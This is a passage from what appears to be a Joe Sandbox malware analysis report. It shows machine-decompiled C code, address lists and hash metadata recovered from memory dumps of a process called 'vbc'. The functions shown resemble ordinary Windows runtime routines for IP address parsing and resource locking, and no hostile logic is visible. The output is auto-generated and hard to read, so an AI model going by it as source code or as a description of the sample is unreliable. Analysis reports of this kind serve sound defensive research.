											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00A40CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00A40CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00A406BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00A406BA(_t124, _t142) == 0 || E00A40A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x00a40b21
0x00a40b24
0x00a40b27
0x00a40b2a
0x00a40b2d
0x00a40b30
0x00a40b33
0x00a40b36
0x00a40b39
0x00a40b3e
0x00a40c65
0x00a40c68
0x00a40c6a
0x00a40c6f
0x00a6eb42
0x00000000
0x00000000
0x00a6eb48
0x00a6eb48
0x00a40c75
0x00a40c7a
0x00a6eb54
0x00000000
0x00000000
0x00000000
0x00a6eb5a
0x00a40c80
0x00a40c84
0x00a6eb98
0x00000000
0x00000000
0x00a6eba6
0x00a40cb8
0x00a40cba
0x00a40cd3
0x00a40cda
0x00a40ce4
0x00a40ce9
0x00000000
0x00a40cec
0x00a40c8c
0x00a6eb63
0x00000000
0x00000000
0x00a6eb70
0x00a6eb75
0x00a6eb7d
0x00000000
0x00000000
0x00a6eb8c
0x00000000
0x00a6eb8c
0x00a40c96
0x00000000
0x00000000
0x00a40ca2
0x00a40cac
0x00a40cb4
0x00000000
0x00000000
0x00a40b44
0x00a40b47
0x00a40b49
0x00000000
0x00000000
0x00a40b4f
0x00a40b50
0x00000000
0x00000000
0x00a40b56
0x00a40b62
0x00a40b7c
0x00a40bac
0x00a40a0f
0x00a6eaaa
0x00000000
0x00a6eac4
0x00a6eac4
0x00a40bd0
0x00a40bd0
0x00a40bd4
0x00a40bd9
0x00000000
0x00000000
0x00a40bdb
0x00a40be0
0x00a6eb0e
0x00a40a1a
0x00000000
0x00a40a1a
0x00a6eb1a
0x00a6eb1f
0x00a6eb27
0x00000000
0x00000000
0x00a6eb36
0x00000000
0x00a6eb36
0x00a40bea
0x00000000
0x00000000
0x00a40bf6
0x00a40c00
0x00a40c03
0x00a40c0b
0x00000000
0x00a40c0b
0x00a6eaaa
0x00000000
0x00a40a15
0x00a40bb6
0x00000000
0x00a40bc6
0x00a40bc6
0x00a40bcb
0x00a40c15
0x00000000
0x00000000
0x00a40c1d
0x00a40c20
0x00a40c21
0x00a40c24
0x00a40c24
0x00a40c26
0x00000000
0x00a40c26
0x00a40bcd
0x00000000
0x00a40bcd
0x00a40b89
0x00a40b89
0x00a40b90
0x00000000
0x00000000
0x00a40b96
0x00000000
0x00a40b96
0x00a40a04
0x00a40a04
0x00a40b9a
0x00a40b9a
0x00a40b9b
0x00a40b9f
0x00000000
0x00000000
0x00000000
0x00a40ba5
0x00a40ac7
0x00a40aca
0x00a6eacf
0x00000000
0x00a6eade
0x00a6eade
0x00a6eae3
0x00000000
0x00000000
0x00a6eaf3
0x00a6eaf6
0x00a6eaf7
0x00a6eafe
0x00a6eb01
0x00000000
0x00a6eb01
0x00a6eacf
0x00a40ad0
0x00a40ad4
0x00000000
0x00000000
0x00a40ada
0x00a40ae6
0x00a40c34
0x00000000
0x00a40c47
0x00a40c49
0x00a40c4a
0x00a40c4e
0x00a40c51
0x00a40c54
0x00a40c57
0x00a40c5a
0x00000000
0x00000000
0x00000000
0x00a40c60
0x00a40afb
0x00a40afe
0x00a40b02
0x00a40b05
0x00a40b08
0x00000000
0x00a40b08
0x00a40ae6
0x00a40b44
0x00a409f8
0x00a409f8
0x00a409f9
0x00000000
0x00000000
0x00a6eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 00A40BF6
__fassign.LIBCMT ref: 00A40CA2

Strings

:, xrefs: 00A40BA9
:, xrefs: 00A40AC7
., xrefs: 00A40A0C

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: f214b70406de7362b1d73cde1ed0345798e7d126cc59d866e066e62151980aa1
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: EDA1E179D0030ADFCF24DF64C880EBEB7B4EF95305F24856ADA42A7282D7349A41EB55

Uniqueness

Uniqueness Score: -1.00%

Function 00A40554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00A40554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00ae01c0;
									_push(_t144);
									_push(0);
									_t51 = E009FF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00A44FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00A53F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00A53F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00A8217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00A53F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00A43915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00ae01c0;
												_push(_t138);
												_push(0);
												_t58 = E009FF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00A44FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00A53F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00A53F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00A8217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00A53F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00A43915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00A25384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E009FF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00A43915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E009FF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00A43915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E009FF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00A43915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00A25329(_t110, _t138);
																_t69 = E00A253A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x00a4055a
0x00a4055d
0x00a40563
0x00a40566
0x00a405d8
0x00a405e2
0x00a405e5
0x00000000
0x00a405e7
0x00a405e7
0x00a405ea
0x00a405f3
0x00a405f3
0x00a40568
0x00a40568
0x00a40568
0x00a40569
0x00a40569
0x00a40569
0x00a4056b
0x00000000
0x00000000
0x00a6217f
0x00a62183
0x00a6225b
0x00a6225f
0x00a62189
0x00a6218c
0x00a6218f
0x00a62194
0x00a62199
0x00a6219d
0x00a621a0
0x00a621a2
0x00a621ce
0x00a621ce
0x00a621ce
0x00a621d0
0x00a621d6
0x00a621de
0x00a621e2
0x00a621e8
0x00a621e9
0x00a621ec
0x00a621f1
0x00a621f6
0x00000000
0x00000000
0x00a621f8
0x00a621fb
0x00a62206
0x00a6220b
0x00a6220c
0x00a62217
0x00a62226
0x00a6222b
0x00a6222c
0x00a6222f
0x00a62232
0x00a62235
0x00a62235
0x00a6223a
0x00a6223f
0x00a62241
0x00a62243
0x00a62248
0x00a62248
0x00a6224d
0x00a6224f
0x00a62262
0x00a62263
0x00a62268
0x00a62269
0x00a62269
0x00a62269
0x00a6226d
0x00000000
0x00000000
0x00a62276
0x00a62279
0x00a6227e
0x00a62283
0x00a62287
0x00a6228a
0x00a6228d
0x00a6228f
0x00a622bc
0x00a622bc
0x00a622bc
0x00a622be
0x00a622c4
0x00a622cc
0x00a622d0
0x00a622d6
0x00a622d7
0x00a622da
0x00a622df
0x00a622e4
0x00000000
0x00000000
0x00a622e6
0x00a622e9
0x00a622f4
0x00a622f9
0x00a622fa
0x00a62305
0x00a62314
0x00a62319
0x00a6231a
0x00a6231d
0x00a62320
0x00a62323
0x00a62323
0x00a62328
0x00a6232d
0x00a6232f
0x00a62331
0x00a62336
0x00a62336
0x00a6233b
0x00a6233d
0x00a62350
0x00a62351
0x00a62356
0x00a62359
0x00a62359
0x00a6235b
0x00a6235d
0x00a25367
0x00a2536b
0x00a25372
0x00000000
0x00000000
0x00000000
0x00000000
0x00a62363
0x00a62363
0x00a62369
0x00a6236a
0x00a6236c
0x00a62371
0x00a62373
0x00000000
0x00a62379
0x00a62379
0x00a6237a
0x00a6237f
0x00a6237f
0x00a62385
0x00a62386
0x00a62389
0x00a6238e
0x00a62390
0x00a25378
0x00a2537c
0x00a62396
0x00a62396
0x00a62397
0x00a6239c
0x00a623a2
0x00a623a3
0x00a623a6
0x00a623ab
0x00a623ad
0x00000000
0x00a623b3
0x00a623b3
0x00a623b4
0x00a623b9
0x00a623ba
0x00a623ba
0x00a623bc
0x00a623bf
0x00000000
0x00000000
0x00a59153
0x00a59158
0x00a5915a
0x00a5915e
0x00a59160
0x00000000
0x00a59166
0x00a59166
0x00a59171
0x00a59176
0x00a59176
0x00000000
0x00a59160
0x00a623c6
0x00a623ce
0x00a623d7
0x00a623d7
0x00a623ad
0x00a62390
0x00a62373
0x00a6233f
0x00a6233f
0x00000000
0x00a6233f
0x00a62291
0x00a62291
0x00a62293
0x00a62295
0x00a6229a
0x00a622a1
0x00a622a3
0x00a622a7
0x00a622a9
0x00000000
0x00000000
0x00a622ab
0x00a622ad
0x00a622af
0x00000000
0x00000000
0x00000000
0x00a622af
0x00a622b1
0x00a622b4
0x00a622b4
0x00a622b6
0x00a253be
0x00a253be
0x00a253be
0x00a253c0
0x00000000
0x00000000
0x00a253cb
0x00a253ce
0x00a253d0
0x00a253d4
0x00a253d6
0x00000000
0x00a253d8
0x00a253e3
0x00a253ea
0x00a253ea
0x00000000
0x00a253d6
0x00000000
0x00000000
0x00000000
0x00000000
0x00a622b6
0x00000000
0x00a6228f
0x00a62349
0x00a6234d
0x00a62251
0x00a62251
0x00000000
0x00a62251
0x00a621a4
0x00a621a4
0x00a621a6
0x00a621a8
0x00a621ac
0x00a621b6
0x00a621b8
0x00a621bc
0x00a621be
0x00000000
0x00000000
0x00a621c0
0x00a621c2
0x00a621c4
0x00000000
0x00000000
0x00000000
0x00a621c4
0x00a621c6
0x00a621c6
0x00a621c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00a621c8
0x00a621a2
0x00000000
0x00a62183
0x00a4057b
0x00a4057d
0x00a40581
0x00a40583
0x00a62178
0x00000000
0x00a40589
0x00a4058f
0x00a4058f
0x00a40583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A62206

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00A6220E
RTL: Re-Waiting, xrefs: 00A6223A, 00A62328
RTL: Resource at %p, xrefs: 00A6221D, 00A6230B
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A622FC

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 781a1b69360d6f49643acbc4a775e0451bde6af0257712ca7202d246bd272aa8
Instruction ID: f510b12933ad2fa97dbec47dec43746e63c9951263ebfc88f77ee9bb51981f30
Opcode Fuzzy Hash: 781a1b69360d6f49643acbc4a775e0451bde6af0257712ca7202d246bd272aa8
Instruction Fuzzy Hash: EE513776B046016BEB148B28CC81FA633B9AFD8721F218229FD19DF285DA71EC458790

Uniqueness

Uniqueness Score: -1.00%

Function 00A414C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00A414C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xae2088; // 0x7777f11a
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00A37707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00A413CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00A37707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00A37707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00A02340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00A0E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x00a414c0
0x00a414cb
0x00a414d2
0x00a414d6
0x00a414da
0x00a414de
0x00a414e3
0x00a4157a
0x00a4157a
0x00a414f1
0x00a414f3
0x00a6ea0f
0x00000000
0x00a6ea15
0x00000000
0x00a6ea15
0x00a414f9
0x00a414f9
0x00a414fe
0x00a41504
0x00a6ea1a
0x00a6ea1f
0x00a6ea21
0x00a6ea22
0x00a6ea27
0x00a6ea2a
0x00a6ea2a
0x00a41515
0x00a41517
0x00a4156d
0x00a41572
0x00a41575
0x00a41575
0x00a4151e
0x00a6ea50
0x00a6ea55
0x00a6ea58
0x00a6ea58
0x00a4152e
0x00a41531
0x00a41533
0x00000000
0x00a41535
0x00a41541
0x00a41549
0x00a41549
0x00a41533
0x00a414f3
0x00a41559

APIs

___swprintf_l.LIBCMT ref: 00A6EA22

Part of subcall function 00A413CB: ___swprintf_l.LIBCMT ref: 00A4146B
Part of subcall function 00A413CB: ___swprintf_l.LIBCMT ref: 00A41490

___swprintf_l.LIBCMT ref: 00A4156D

Strings

]:%u, xrefs: 00A6EA47
%%%u, xrefs: 00A41564

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 51a8652c59c22a7516413e0fb304eab5a58354704f8ea3c2f54e70480d0afc98
Instruction ID: efdad50921c4c877daf2fb7c32043ae97c7b81124c2e442e3c97a1f6eb79cfab
Opcode Fuzzy Hash: 51a8652c59c22a7516413e0fb304eab5a58354704f8ea3c2f54e70480d0afc98
Instruction Fuzzy Hash: 2721A576900219ABCF20DF54DD45AEFB3BCBB90700F544555FC5AD3141EB70AA988BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00A253A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00A253A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00ae01c0;
									_push(_t92);
									_push(0);
									_t37 = E009FF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00A44FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00A53F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00A53F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00A8217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00A53F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00A43915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00A25384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E009FF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00A43915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E009FF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00A43915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
